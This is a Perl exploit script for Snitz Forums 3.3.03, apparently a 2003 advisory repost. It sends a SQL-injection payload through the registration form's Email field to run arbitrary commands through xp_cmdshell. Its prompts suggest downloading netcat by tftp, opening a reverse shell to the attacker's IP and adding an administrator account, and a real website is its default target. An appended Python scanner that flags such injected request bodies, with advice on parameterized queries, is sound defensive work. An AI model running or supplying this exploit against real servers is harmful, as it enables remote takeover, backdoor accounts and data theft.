2003-05-12 Snitz Forum 3.3.03 Remote Command Execution Exploit
#!/usr/bin/perl
#
# Snitz Forums 3.3.03: the "Email" field posted to register.asp?mode=DoIt is
# concatenated into a SQL statement, so a value that closes the quoted literal
# can append "exec master..xp_cmdshell '<command>'" on the SQL Server back end.

use Socket;

print "\nRemote command execution against Snitz Forums 3.3.03 (and probably others).\n";
print "You accept full responsibility for your actions by using this script.\n";
print "INTERNAL USE ONLY!! DO NOT DISTRIBUTE!!\n";

# Target host, port and path to register.asp, with the author's defaults.
print "\nWeb server? [www.enterthegame.com]: ";
my $webserver = <STDIN>;
chomp $webserver;
if( $webserver eq "" )
{
    $webserver = "www.enterthegame.com";
}

print "\nWeb server port? [80]: ";
my $port = <STDIN>;
chomp $port;
if( $port eq "" )
{
    $port = 80;
}

print "\nAbsolute path to \"register.asp\"? [/forum/register.asp]: ";
my $path = <STDIN>;
chomp $path;
if( $path eq "" )
{
    $path = "/forum/register.asp";
}

print "\nCommand to execute non-interactively\n";
print " Example commands: tftp -i Your.IP.Here GET nc.exe\n";
print " nc.exe -e cmd.exe Your.IP.Here YourNetcatListeningPortHere\n";
print " or: net user h4x0r /add | net localgroup Administrators h4x0r /add\n";
print "Your command: ";
my $command = <STDIN>;
chomp $command;
$command =~ s/ /%20/g;    # URL-encode spaces so the command survives the form body

# Connect on the port entered above (the original passed a hard-coded 80 here).
if( !open_TCP( FILEHANDLE, $webserver, $port ) )
{
    print "Error connecting to $webserver:$port\n";
    exit( 0 );
}
else
{
    # Injected form body: the leading quote closes the Email literal, xp_cmdshell
    # runs the command, and "--" comments out the rest of the original statement.
    my $data1 = $path . "?mode=DoIt";
    my $data2 = "Email='%20exec%20master..xp_cmdshell%20'" . $command . "'%20--&Name=snitz";
    my $length = length( $data2 );

    print FILEHANDLE "POST $data1 HTTP/1.1\n";
    if( $port == 80 )
    {
        print FILEHANDLE "Host: $webserver\n";
    }
    else
    {
        print FILEHANDLE "Host: $webserver:$port\n";
    }
    print FILEHANDLE "Accept: */*\n";
    # Single header name here; the original emitted "User-Agent: User-Agent: ...".
    print FILEHANDLE "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\n";
    print FILEHANDLE "Keep-Alive: 300\n";
    print FILEHANDLE "Referer: http://$webserver$path?mode=Register\n";
    print FILEHANDLE "Content-Type: application/x-www-form-urlencoded\n";
    print FILEHANDLE "Content-Length: $length\n\n";
    print FILEHANDLE "$data2";

    print "\nSQL injection command sent. If you are waiting for a shell on your listening\n";
    print "netcat, hit \"enter\" a couple of times to be safe.\n\n";

    close( FILEHANDLE );
}

# Open a TCP connection on the given (bareword) filehandle and make it unbuffered.
sub open_TCP
{
    my( $FS, $dest, $port ) = @_;

    my $proto = getprotobyname( 'tcp' );
    socket( $FS, PF_INET, SOCK_STREAM, $proto ) || return undef;
    my $sin = sockaddr_in( $port, inet_aton( $dest ));
    connect( $FS, $sin ) || return undef;

    my $old_fh = select( $FS );
    $| = 1;              # autoflush so the request goes out immediately
    select( $old_fh );
    return 1;
}
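Added here as a defensive illustration, not part of the original exploit listing or of Snitz: a small Python scanner that URL-decodes a form-encoded POST body of the shape the script above sends and reports the SQL-injection markers in it (a quote that closes the literal, a stacked EXEC/SELECT, xp_cmdshell, a trailing "--" comment). The request records are constructed samples, and the field names (Email, Name) and path follow the listing; the indicator set and scoring rule are my own and can be tuned.

```python
"""Flag form posts carrying the kind of SQL injection the script above sends.
The sample requests below are constructed for illustration; they are not
captured traffic. Field names (Email, Name) and the request shape follow the
exploit listing."""
import re
from urllib.parse import parse_qs

# Indicator patterns, applied to each URL-decoded form value.
INDICATORS = {
    "xp_cmdshell": re.compile(r"xp_cmdshell", re.IGNORECASE),
    "sql_keyword": re.compile(r"\b(exec|execute|select|union|insert|update|delete|drop)\b",
                              re.IGNORECASE),
    "quote_break": re.compile(r"'"),      # a quote that can close the SQL literal
    "comment": re.compile(r"--"),         # T-SQL line comment discarding the rest
}


def scan_form_body(body):
    """Decode an application/x-www-form-urlencoded body and return
    {field: [indicator names]} for every field with at least one hit."""
    hits = {}
    for field, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            matched = [name for name, rx in INDICATORS.items() if rx.search(value)]
            if matched:
                hits[field] = matched
    return hits


def is_injection(body):
    """True when a field names xp_cmdshell outright, or combines a quote
    break with a SQL keyword and a trailing comment (the exploit's shape).
    A lone apostrophe (O'Brien) is not enough on its own."""
    for matched in scan_form_body(body).values():
        if "xp_cmdshell" in matched:
            return True
        if {"quote_break", "sql_keyword", "comment"} <= set(matched):
            return True
    return False


def flag_requests(requests):
    """Return (method, path, hits) for each request whose body looks like
    an injection attempt."""
    return [(m, p, scan_form_body(b)) for m, p, b in requests if is_injection(b)]


# Constructed sample records: (method, path, raw form body).
SAMPLE_REQUESTS = [
    # the shape the script above produces, with "dir" standing in for a command
    ("POST", "/forum/register.asp?mode=DoIt",
     "Email='%20exec%20master..xp_cmdshell%20'dir'%20--&Name=snitz"),
    # ordinary registration
    ("POST", "/forum/register.asp?mode=DoIt",
     "Email=alice%40example.org&Name=alice"),
    # legitimate apostrophe in a name, no SQL around it
    ("POST", "/forum/register.asp?mode=DoIt",
     "Email=obrien%40example.org&Name=O%27Brien"),
    # a stacked query without xp_cmdshell still matches on shape
    ("POST", "/forum/register.asp?mode=DoIt",
     "Email='%3B%20select%20%40%40version%20--&Name=snitz"),
]

if __name__ == "__main__":
    for method, path, hits in flag_requests(SAMPLE_REQUESTS):
        print(method, path, hits)
```

IIS access logs do not record POST bodies by default, so this is meant to run over bodies obtained from a reverse proxy, WAF or packet capture. It is a detection aid only: the fix for the page's bug is parameterized queries in register.asp, and not granting the web application's SQL login the rights to reach xp_cmdshell at all.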


securitydot.net - 2003-05-12

Copyright 2007, SecurityDot